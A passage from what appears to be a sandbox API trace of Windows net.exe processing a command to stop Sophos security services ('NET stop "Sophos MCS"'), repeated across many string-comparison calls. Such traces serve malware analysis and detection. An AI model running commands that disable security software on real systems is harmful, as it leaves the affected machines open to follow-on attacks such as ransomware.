(hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x19 [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET HELPMSG\r\nmessage#\r", _MaxCount=0x16) returned 11 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xc1 [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET LOCALGROUP\r\n[group", _MaxCount=0x16) returned 7 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x16 [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x16) returned 3 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x33 [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET SESSION\r\n[\\\\comput", _MaxCount=0x16) returned 15 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x234 [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET SHARE\r\nsharename\r\n", _MaxCount=0x16) returned 12 [0204.164] LocalFree (hMem=0x765628) returned 0x0 [0204.164] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x13 [0204.164] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START BROWSER\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x14 [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x14 [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START EVENTLOG\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x15 [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START MESSENGER\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x15 [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START NET LOGON\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x16 [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x11 [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START RPCSS\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x14 [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START SCHEDULE\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x12 [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START SERVER\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xf [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START UPS\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x17 [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START WORKSTATION\r", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x18 [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET START\r\n[service]\r\n", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.165] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x2a [0204.165] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET STATISTICS\r\n[WORKS", _MaxCount=0x16) returned 14 [0204.165] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x15 [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x16) returned 19 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x58 [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET TIME\r\n\r\n[\\\\compute", _MaxCount=0x16) returned -1 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x184 [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET USE\r\n[devicename |", _MaxCount=0x16) returned -2 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xc7 [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET USER\r\n[username [p", _MaxCount=0x16) returned -2 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x47 [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET VIEW\r\n[\\\\computern", _MaxCount=0x16) returned -3 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xc2 [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NET\r\n [ ACCOUNTS | ", _MaxCount=0x16) returned 19 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x319 [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="SERVICES\r\nNET START ca", _MaxCount=0x16) returned -5 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x483 [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="SYNTAX\r\nThe following ", _MaxCount=0x16) returned -5 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xa86 [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="NAMES\r\nThe following t", _MaxCount=0x16) returned 4 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x54 [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS", _String2="\r\nFor more information", _MaxCount=0x16) returned 97 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xad [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.166] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x2e [0204.166] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0204.166] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x7d [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x26 [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x19 [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x1b [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xbe [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x33 [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x19 [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0xc1 [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x16 [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x33 [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x234 [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x13 [0204.167] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0204.167] LocalFree (hMem=0x765628) returned 0x0 [0204.167] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x14 [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x765628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x14 [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x765628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="嘨v⡋瓢蘒2嘨v樂2") returned 0x15 [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x765628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="瘨v⡋瓢蘒2嘨v樂2") returned 0x15 [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x767628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2瘨v樂2") returned 0x16 [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x769628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x11 [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x769628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x14 [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x769628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x12 [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x769628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0xf [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x769628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x17 [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x769628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x18 [0204.168] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0204.168] LocalFree (hMem=0x769628) returned 0x0 [0204.168] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x2a [0204.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0204.169] LocalFree (hMem=0x769628) returned 0x0 [0204.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x15 [0204.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0204.169] LocalFree (hMem=0x769628) returned 0x0 [0204.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x58 [0204.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0204.169] LocalFree (hMem=0x769628) returned 0x0 [0204.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x184 [0204.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0204.169] LocalFree (hMem=0x769628) returned 0x0 [0204.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0xc7 [0204.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0204.169] LocalFree (hMem=0x769628) returned 0x0 [0204.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x47 [0204.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0204.169] LocalFree (hMem=0x769628) returned 0x0 [0204.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0xc2 [0204.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0204.169] LocalFree (hMem=0x769628) returned 0x0 [0204.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x319 [0204.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0204.169] LocalFree (hMem=0x769628) returned 0x0 [0204.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x483 [0204.169] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0204.169] LocalFree (hMem=0x769628) returned 0x0 [0204.169] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0xa86 [0204.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x32f968, nSize=0x0, Arguments=0x32f964 | out: lpBuffer="阨v⡋瓢蘒2阨v樂2") returned 0x54 [0204.170] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0204.170] LocalFree (hMem=0x769628) returned 0x0 [0204.170] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, 